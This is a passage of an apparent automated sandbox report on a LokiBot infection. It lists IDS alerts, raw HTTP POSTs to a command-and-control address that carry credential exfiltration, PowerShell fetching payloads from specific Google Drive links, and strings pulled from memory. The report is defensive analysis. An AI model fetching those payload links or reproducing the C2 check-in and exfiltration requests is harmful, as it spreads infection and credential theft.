                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65338 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65325 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65325 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65338 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65342 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65342 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65340 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65340 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65314 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65317 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65317 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65331 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65331 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65322 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65329 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65322 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65322 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65326 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65326 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65336 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65336 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65326 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65326 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65327 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65336 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65327 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65314 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65336 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65314 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65327 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65327 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65331 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65331 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65334 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65341 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65341 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65337 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65337 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65334 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65341 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65341 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65337 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65337 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65333 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65333 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65333 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65333 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65335 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65335 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65335 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65335 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65334 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65334 -> 137.184.191.215:80
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:65310 -> 216.58.206.46:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
                Source: dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/10899
                Source: powershell.exe, 00000004.00000002.3052757147.00000000076E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B22A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPz
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B092B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: dxdiag.exe, 00000014.00000002.3346265000.0000000021150000.00000004.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f
                Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_fd
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuP
                Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuXR
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhh
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                Source: dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/S
                Source: dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
                Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download2
                Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=downloadd
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download
                Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/earc%(
